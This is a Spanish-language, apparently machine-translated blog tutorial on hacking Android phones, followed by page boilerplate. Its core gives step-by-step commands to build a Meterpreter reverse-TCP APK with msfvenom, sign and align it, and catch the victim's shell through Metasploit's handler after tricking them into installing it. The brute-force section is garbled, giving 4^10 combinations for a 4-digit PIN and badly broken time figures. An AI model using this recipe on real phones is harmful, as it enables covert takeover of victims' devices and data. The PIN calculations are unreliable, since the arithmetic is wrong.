Los métodos utilizados por los atacantes para explotar los teléfonos Android están aumentando. La gente está ocupada encontrando nuevas vulnerabilidades para explotar. A continuación se muestran algunas formas de hackear teléfonos Android:  Ataque HID (dispositivo de interfaz humana)  Contraseña fuerza bruta  Cargas útiles (secuencias de comandos de piratería personalizadas)  Restablecimiento de fábrica  Derivación  ESCONDIDO  El ataque HID es un escenario en el que un atacante toma una plataforma de desarrollo integrada programable, como un paquete de software asociado como SET (Social Engineering Toolkit), Metasploit, etc., o usa otros teléfonos y USB que están programados para ser un RubberDucky y ejecutar un ataque.   En tal ataque, el hacker instala una puerta trasera y, al usarla, descarga completamente la información del objetivo.  Usando la información, puede piratear la cuenta bancaria de la persona o incluso venderla en la web oscura.  Puedes ver cómo se lleva a cabo un ataque oculto desde el  canal   android infosec  Iniciar sesión Fuerza bruta  Un ataque de fuerza bruta utiliza el método de prueba y error para adivinar la contraseña correcta del teléfono.   Algunos puntos importantes a considerar para realizar un ataque de este tipo:  Número de contraseñas  el tiempo de espera  El tiempo que podría tomar     El tiempo de espera:             After 5 Wrong pin 's - 30 sec delay After 1 Wrong pin' s - 30 sec delay After 41 Wrong pin 's - 30 sec delay   El número de contraseñas:  El número total de combinaciones posibles para un candado numérico de 4 dígitos puede comenzar desde 4 ceros hasta 4 nueves, lo que significa 0000-9999, por lo que tenemos aproximadamente:            4 ^ 10  amount of password or 
 1048576  passwords in  total   Tiempo consumido:  Veamos algunas posibilidades para nuestra comprensión:    5 contraseñas incorrectas, un retraso de 30 segundos. Necesitamos averiguar cuántas veces obtenemos el retraso en primer lugar y encontrar el tiempo total consumido.  Posibilidad #1:            total time         total delay 1048576 / 5  = 209715.2  times 209715.2  * 30  = 6291456  sec or 
 1747.6266  hours    : 41 contraseñas incorrectas, demora 30 seg.  Posibilidad #2              total time consumed                             total delays 1048576  / 41  = 25 , 575.0243  delays 25575.0243  * 30  = 7 , 67 , 250.729  sec or  
 767250.729  / 60  = 12 , 787.5121   min 
 or 
 12 , 787.51215  hours  Puede ver que es casi imposible encontrar la contraseña del teléfono de la persona por fuerza bruta. Estarás muerto cuando encuentres la contraseña del teléfono 😣.  cargas útiles   Las cargas útiles son scripts simples que ayudan a un pirata informático a piratear un sistema. Entonces, si solo engaño a la persona para que autorice e instale el archivo .apk, lo que abre una puerta trasera para que Meterpreter escuche una conexión para controlar el sistema.     meterpreter reverse tcp payload creation command:         msfvenom –p android/meterpreter/reverse_tcp LHOST =Localhost  IP   LPORT =LocalPort R > android_shell.apk  La carga útil es -p, LHOST Localhost IP para recibir una conexión posterior (verifique la suya con el comando   ), LPORT Puerto localhost en el que la conexión escucha a la víctima (lo configuramos en 4444), formato R Raw (seleccionamos .apk ). if-config  Necesitamos proporcionar un certificado al archivo .apk para darle una identidad. Necesitamos firmar un certificado para un archivo .apk para reconocerlo como una aplicación. Sin esto, el archivo .apk se reconocerá como un virus.  Para asignar un certificado, debe seguir estos pasos   Instalar:  herramienta clave  firmante del tarro  tirolesa     Firme el archivo .apk localmente:      keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048  -validity 10000     Keytool haciendo Keystore:  jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hacked     Firmando un archivo .apk con JARsigner:  jarsigner -verify -verbose -certs android_shell.apk     Instale y use Zipalign:    or sudo apt install zipalign  sudo apt-get install zipalign    zipalign -v 4  android_shell.apk singed_jar.apk  Ahora ejecute el comando para eso está en la consola de Metasploit:    use exploit/multi/handler  Y configure los diversos parámetros en Metasploit como lhost, lport, etc. Ahora debe ejecutar el comando después de configurar el host y el tipo de puerto:     run (and press enter) type:  Después de ejecutar este código, recibirá una conexión con el sistema de destino. Con esto, puede acceder a todo el sistema y obtener acceso completo.  Restablecimiento de fábrica   Un teléfono flasheado es un dispositivo en el que se ha flasheado una ROM/sistema operativo diferente sobre el sistema que viene con el teléfono. A menudo, los teléfonos pueden mostrarse desbloqueados cuando, en realidad, siguen siendo teléfonos con la marca del operador que no serán compatibles con nuestro servicio.  Para cada teléfono, existen diferentes métodos para el restablecimiento de fábrica, el más común es hacerlo a través de los botones de volumen y el botón de encendido. Por ejemplo, tengo un viejo teléfono oppo para el cual la combinación de restablecimiento de fábrica es el botón de volumen y el botón de encendido y durante 5 segundos y el teléfono parpadea.  Derivación  Bypass es un método comúnmente utilizado por las fuerzas del orden como la CIA, el FBI y en India, IB y RAW utilizan un dispositivo especial como se muestra en la imagen.   En este tipo de ataque, depende principalmente de que el atacante use IP_BOX, que funciona principalmente en la fuerza bruta del objetivo. Esto es utilizado principalmente por las fuerzas del orden público para acceder a los teléfonos de los ciberdelincuentes terroristas y los teléfonos de otros delincuentes.  Puede usar otra herramienta conocida como BashBunny de hak5. Esta es una mini computadora desde la cual puede realizar un ataque de fuerza bruta de inicio de sesión. A diferencia de las otras opciones anteriores, esta es una bestia seria en su trabajo. En cuestión de horas, puede descifrar las contraseñas más difíciles con facilidad.   Nota   Este tutorial es solo para fines educativos. No intentes esto y te metas en problemas.  Fuentes  rapid7     referidos  ( información y documentos de Metasploit )  android infosec      ( Aprenda sobre el ataque HID )  David Bombal      ( Aprenda sobre Bash-Bunny )  Sígueme  Twitter: morfeuslord2  Instagram: morpheuslord_9034  correo electrónico: morpheuslord@protonmail.com

This story contains new, firsthand information uncovered by the writer.

Instagram

Target

Twitter

Personal Website

LinkedIn

HuggingFace

Github

Cybersecurity Engineer

Este audio es producido en el idioma original de la historia!

Cómo hackear teléfonos Android

About Author

COMENTARIOS

ETIQUETAS

ESTE ARTÍCULO FUE PRESENTADO EN

Related Stories

La fuga rápida del sistema Claude Sonnet 3.5: un análisis forense

Liberando el poder de la IA. Una revisión sistemática de técnicas de vanguardia: resumen e introducción

Una breve introducción a la teoría del cerebro de Boltzmann

Valhalla de Floki se une como patrocinador asociado de la gira de la India por Sri Lanka

La fuga rápida del sistema Claude Sonnet 3.5: un análisis forense

Liberando el poder de la IA. Una revisión sistemática de técnicas de vanguardia: resumen e introducción

Una breve introducción a la teoría del cerebro de Boltzmann

Valhalla de Floki se une como patrocinador asociado de la gira de la India por Sri Lanka

Light-Mode

Classic

Newspaper

Dark-Mode

Neon Noir

Minty

HN StartUps